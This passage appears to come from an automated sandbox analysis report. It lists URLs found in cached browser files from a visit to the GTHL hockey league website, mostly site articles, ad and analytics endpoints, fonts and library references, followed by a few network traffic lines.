Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/20173705/Spengler-Cup-Hockey-Canada-7
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/23150859/2025-GTHL-Playoffs-1600x900-
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/02124840/GTHL-Officials-1600x900-730x
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/02154916/AROUND-THE-G-TITLE-January-2
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/06103844/DECA-Title-1600x900-GTHL-Pow
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/06205151/DECAA-Title-1600x900-GTHL-Po
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/07211622/DECAAA-Title-1600x900-GTHL-P
Source: chromecache_261.1.drString found in binary or memory: https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/13092716/25-TP-Game-Move-1600x900-Web
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent#Key_names
Source: chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: chromecache_261.1.drString found in binary or memory: https://dff2h0hbfv6w4.cloudfront.net/scripts/loader.js
Source: chromecache_222.1.dr, chromecache_210.1.dr, chromecache_172.1.drString found in binary or memory: https://ep1.adtrafficquality.google/bg/
Source: chromecache_172.1.drString found in binary or memory: https://ep1.adtrafficquality.google/pagead/gen_204?id=sodar2&v=231
Source: chromecache_222.1.dr, chromecache_210.1.drString found in binary or memory: https://ep1.adtrafficquality.google/pagead/gen_204?id=sodar2&v=232
Source: chromecache_172.1.drString found in binary or memory: https://ep1.adtrafficquality.google/pagead/sodar?id=sodar2&v=231
Source: chromecache_222.1.dr, chromecache_210.1.drString found in binary or memory: https://ep1.adtrafficquality.google/pagead/sodar?id=sodar2&v=232
Source: chromecache_210.1.drString found in binary or memory: https://ep2.adtrafficquality.google
Source: chromecache_222.1.dr, chromecache_210.1.drString found in binary or memory: https://ep2.adtrafficquality.google/sodar/
Source: chromecache_277.1.dr, chromecache_348.1.drString found in binary or memory: https://ep3.adtrafficquality.google/ivt/worklet/caw.js
Source: chromecache_317.1.dr, chromecache_320.1.dr, chromecache_266.1.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto:wght
Source: chromecache_368.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2)
Source: chromecache_368.1.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjxAwXjeu.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqW106F15M.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWt06F15M.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtE6F15M.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtU6F15M.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtk6F15M.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWu06F15M.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWuU6F.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWuk6F15M.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWvU6F15M.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWxU6F15M.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS2mu1aB.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSCmu1aB.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSymu1aB.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTUGmu1aB.woff2)
Source: chromecache_326.1.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTVOmu1aB.woff2)
Source: chromecache_258.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)
Source: chromecache_258.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)
Source: chromecache_258.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)
Source: chromecache_258.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)
Source: chromecache_258.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)
Source: chromecache_258.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)
Source: chromecache_258.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)
Source: chromecache_258.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)
Source: chromecache_258.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)
Source: chromecache_261.1.drString found in binary or memory: https://fr.gthlcanada.com.com/
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/MadMG
Source: chromecache_296.1.drString found in binary or memory: https://github.com/Oire
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/Viktorminator
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/armendarabyan
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/avaly
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/bmarkovic
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/demidov91
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: https://github.com/facebook/react/issues/1698
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: https://github.com/facebook/react/issues/708.
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/frontyard
Source: chromecache_277.1.dr, chromecache_348.1.drString found in binary or memory: https://github.com/google/safevalues/issues
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/gurdiga
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/hinrik
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/irakli-janiashvili
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/jbleduigou
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/kwisatz
Source: chromecache_344.1.dr, chromecache_337.1.drString found in binary or memory: https://github.com/larrymyers/react-mini-router
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/lluchs
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/madhenry
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/mweimerskirch
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/ragulka
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/sedovsek
Source: chromecache_225.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/zemlanin
Source: chromecache_261.1.drString found in binary or memory: https://gthl.s3.amazonaws.com/assets/images/gthl_logo_thumb-1.png
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/2025-gthl-playoff-formats/
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/js_composer/assets/css/vc_lte_ie9.min.css
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/latest_news/public/css/latest-news-public.css?ver=1.0.0
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/latest_news/public/js/latest-news-public.js?ver=1.0.0
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.3.5
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=4.5.3
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/sitepress-multilingual-cms/res/js/xdomain-data.js?ver=3.3.5
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/tagged_content_blocks/public/css/tagged-content-blocks-public.css
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/tagged_content_blocks/public/js/tagged-content-blocks-public.js?v
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/wp-polls/images/default/pollbg.gif
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/wp-polls/polls-css.css?ver=2.7
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/wp-polls/polls-js.js?ver=2.7
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.15
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/wpml-cms-nav/res/css/cms-navigation.css?ver=1.4.15
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.15
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/themes/base/assets/dist/css/core.css
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/themes/base/assets/dist/scripts/js/main.js
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/themes/base/bower_components/jsTimezoneDetect/jstz.min.js
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/themes/base/bower_components/moment-timezone/builds/moment-timezone-with-
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/themes/base/bower_components/moment/min/moment-with-locales.min.js
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/themes/base/bower_components/react-mini-router/dist/react-mini-router.min
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/themes/gthl/assets/dist/css/theme.css
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/app/themes/gthl/favicon.ico
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/2025-gthl-top-prospects-game-to-move-to-scotiabank-pond
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/around-the-g-december-2024-preview
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/around-the-g-january-2025-preview
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/around-the-g-november-2024-preview
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/balancing-school-and-hockey-tips-for-student-athletes
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/beyond-the-whistle-broidy-rondelet
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/easy-game-day-meals-for-the-season
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/ed-wahl-recognized-with-gthls-2024-george-chamandy-memorial-trophy
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/five-healthy-snacks-for-the-summer
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/four-gthl-alumni-named-to-national-womens-under-18-team-for-2025-iihf
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/from-practice-to-game-day-creating-a-pre-game-routine
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/gthl-a-power-rankings-december-2024
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/gthl-aa-power-rankings-december-2024
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/gthl-aaa-power-rankings-december-2024
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/gthl-announces-appointment-of-special-integrity-commissioner
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/gthl-announces-officiating-selections-for-2025-top-prospects-game-fue
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/gthl-carnegie-family-announce-herbert-h-carnegie-award
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/gthl-hosting-free-women-and-girls-coaching-clinics-for-fifth-consecut
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/inclusion-not-exclusion-the-gthl-and-you-can-play
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/iplayintheg-2023-pro-hockey-life-cup
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/iplayintheg-hockey-at-home
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/iplayintheg-holiday-spirit
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/markham-islanders-host-second-annual-sylvia-jacobs-memorial-winter-cl
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/ontario-hockey-federation-announces-updates-to-player-movement-regula
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/platinum-cup-tournament-to-feature-second-annual-maple-leafs-alumni-v
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/playstation-platinum-cup-returns-for-2022-23-season
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/recap-2022-playstation-platinum-cup-powered-by-the-toronto-maple-leaf
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/recap-2024-gthl-awards-presented-by-nothers-the-award-store
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/recap-2024-platinum-cup-powered-by-the-toronto-maple-leafs-and-the-gt
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/six-gthl-alumni-named-to-national-junior-team-for-2025-iihf-world-jun
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/snacks-to-fuel-performance
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/three-gthl-alumni-named-to-canadas-national-mens-team-for-2024-spengl
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/toronto-red-wings-announce-three-year-partnership-with-hockey-equalit
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/u10-a-applewood-coyotes-give-back-to-mississauga-food-bank
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/u10-aa-west-mall-lightning-show-spirit-of-giving-with-charity-run-and
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/article/world-mental-health-day-7-day-challenge
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/gallery/gallery-2022-playstation-platinum-cup
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/gallery/gallery-2024-a-challenge-cup
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/gallery/gallery-2024-gthl-breakout-summit
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/gallery/gallery-2024-platinum-cup
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/safe-sport-reporting/
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/starthockey/
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/wp-json/
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/wp/wp-includes/js/jquery/jquery.js?ver=1.12.4
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/wp/wp-includes/js/wp-embed.min.js?ver=4.5.3
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/wp/wp-includes/wlwmanifest.xml
Source: chromecache_261.1.drString found in binary or memory: https://gthlcanada.com/wp/xmlrpc.php?rsd
Source: chromecache_246.1.dr, chromecache_290.1.drString found in binary or memory: https://js.foundation/
Source: chromecache_246.1.dr, chromecache_290.1.drString found in binary or memory: https://lodash.com/
Source: chromecache_246.1.dr, chromecache_290.1.drString found in binary or memory: https://lodash.com/license
Source: chromecache_214.1.drString found in binary or memory: https://login.canpl.ca/api/matches
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://login.canpl.ca/api/players
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://login.canpl.ca/api/players/
Source: chromecache_261.1.drString found in binary or memory: https://loopconstruct.com/6ljJxaQCuR5NzGsVTDoIlQAhudWke8oUmB-zufTHyLNw
Source: chromecache_261.1.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
Source: chromecache_246.1.dr, chromecache_290.1.drString found in binary or memory: https://npms.io/search?q=ponyfill.
Source: chromecache_246.1.dr, chromecache_290.1.drString found in binary or memory: https://openjsf.org/
Source: chromecache_339.1.drString found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_222.1.dr, chromecache_210.1.dr, chromecache_172.1.drString found in binary or memory: https://pagead2.googlesyndication.com/bg/
Source: chromecache_246.1.dr, chromecache_290.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=colleague-executed&name=
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=error&bin=
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=error&name=invalid_geo&context=10
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=extra&rnd=
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=fetch&later&lidartos
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=fetch&later&start&control&fle=1&s
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=fle-fetch-fallback2
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=fle-fetch-later2
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=fle-fetch-pagehide2
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=fle-fetch-start2
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=av-js&type=reach&proto=
Source: chromecache_172.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=sodar2&v=231
Source: chromecache_222.1.dr, chromecache_210.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=sodar2&v=232
Source: chromecache_332.1.dr, chromecache_339.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_200.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/sodar?
Source: chromecache_172.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/sodar?id=sodar2&v=231
Source: chromecache_222.1.dr, chromecache_210.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/sodar?id=sodar2&v=232
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: https://people.mozilla.org/~jorendorff/es6-draft.html#sec-object.assign
Source: chromecache_310.1.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_290.1.drString found in binary or memory: https://publickeyservice.msmt.gcp.privacysandboxservices.com
Source: chromecache_261.1.drString found in binary or memory: https://secure.widget.cloud.opta.net/v3/css/v3-mobile.all.opta-widgets.css
Source: chromecache_261.1.drString found in binary or memory: https://secure.widget.cloud.opta.net/v3/css/v3.all.opta-widgets.css
Source: chromecache_261.1.drString found in binary or memory: https://secure.widget.cloud.opta.net/v3/css/v3.football.opta-widgets.css
Source: chromecache_277.1.dr, chromecache_348.1.drString found in binary or memory: https://securepubads.g.doubleclick.net/pagead/js/car.js
Source: chromecache_277.1.dr, chromecache_348.1.drString found in binary or memory: https://securepubads.g.doubleclick.net/pagead/js/cocar.js
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://stanza.co/schedules/cpl/cavalryfcschedule
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://stanza.co/schedules/cpl/fcedmontonschedule
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://stanza.co/schedules/cpl/forgefcschedule
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://stanza.co/schedules/cpl/hfxwanderersfcschedule
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://stanza.co/schedules/cpl/pacificfcschedule
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://stanza.co/schedules/cpl/valourfcschedule
Source: chromecache_163.1.dr, chromecache_214.1.drString found in binary or memory: https://stanza.co/schedules/cpl/york9fcschedule
Source: chromecache_332.1.dr, chromecache_339.1.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chromecache_218.1.drString found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: chromecache_310.1.drString found in binary or memory: https://support.google.com/recaptcha
Source: chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drString found in binary or memory: https://support.google.com/recaptcha#6262736
Source: chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
Source: chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
Source: chromecache_263.1.dr, chromecache_218.1.drString found in binary or memory: https://tagassistant.google.com/
Source: chromecache_332.1.dr, chromecache_339.1.drString found in binary or memory: https://td.doubleclick.net
Source: chromecache_210.1.drString found in binary or memory: https://tpc.googlesyndication.com
Source: chromecache_222.1.dr, chromecache_210.1.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/
Source: chromecache_261.1.drString found in binary or memory: https://twitter.com/GTHLHockey
Source: chromecache_261.1.drString found in binary or memory: https://www.getgitch.com/
Source: chromecache_263.1.dr, chromecache_218.1.drString found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
Source: chromecache_263.1.dr, chromecache_218.1.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: chromecache_263.1.dr, chromecache_218.1.drString found in binary or memory: https://www.google.%/ads/ga-audiences
Source: chromecache_339.1.drString found in binary or memory: https://www.google.com
Source: chromecache_263.1.dr, chromecache_218.1.drString found in binary or memory: https://www.google.com/ads/ga-audiences
Source: chromecache_261.1.drString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: chromecache_347.1.dr, chromecache_281.1.dr, chromecache_292.1.dr, chromecache_176.1.dr, chromecache_310.1.drString found in binary or memory: https://www.google.com/recaptcha/api2/
Source: chromecache_222.1.dr, chromecache_210.1.dr, chromecache_172.1.drString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
Source: chromecache_332.1.dr, chromecache_157.1.dr, chromecache_246.1.dr, chromecache_375.1.dr, chromecache_290.1.dr, chromecache_339.1.drString found in binary or memory: https://www.googleadservices.com
Source: chromecache_157.1.dr, chromecache_246.1.dr, chromecache_375.1.dr, chromecache_290.1.drString found in binary or memory: https://www.googleadservices.com/.well-known/private-aggregation/report-shared-storage
Source: chromecache_157.1.dr, chromecache_375.1.drString found in binary or memory: https://www.googleadservices.com/pagead/managed/js/activeview/
Source: chromecache_246.1.dr, chromecache_290.1.drString found in binary or memory: https://www.googleadservices.com/pagead/managed/js/activeview/$
Source: chromecache_339.1.drString found in binary or memory: https://www.googletagmanager.com
Source: chromecache_263.1.dr, chromecache_218.1.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: chromecache_157.1.dr, chromecache_246.1.dr, chromecache_375.1.dr, chromecache_290.1.drString found in binary or memory: https://www.googletagservices.com/agrp/
Source: chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/zIriijn3uj5Vpknvt_LnfNbF/recaptcha__.
Source: chromecache_285.1.dr, chromecache_281.1.dr, chromecache_257.1.dr, chromecache_176.1.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/zIriijn3uj5Vpknvt_LnfNbF/recaptcha__en.js
Source: chromecache_261.1.drString found in binary or memory: https://www.gthlcanada.com/?feed=rss2
Source: chromecache_261.1.drString found in binary or memory: https://www.hhof.com/index.html?utm_source=GTHL&utm_medium=Late
Source: chromecache_261.1.drString found in binary or memory: https://www.instagram.com/gthlhockey
Source: chromecache_261.1.drString found in binary or memory: https://www.instagram.com/gthlhockey/
Source: chromecache_332.1.dr, chromecache_339.1.drString found in binary or memory: https://www.merchant-center-analytics.goog
Source: chromecache_261.1.drString found in binary or memory: https://www.nothers.com/
Source: chromecache_168.1.dr, chromecache_354.1.drString found in binary or memory: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Source: chromecache_261.1.drString found in binary or memory: https://www.youtube.com/user/GTHLBreakoutTV
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
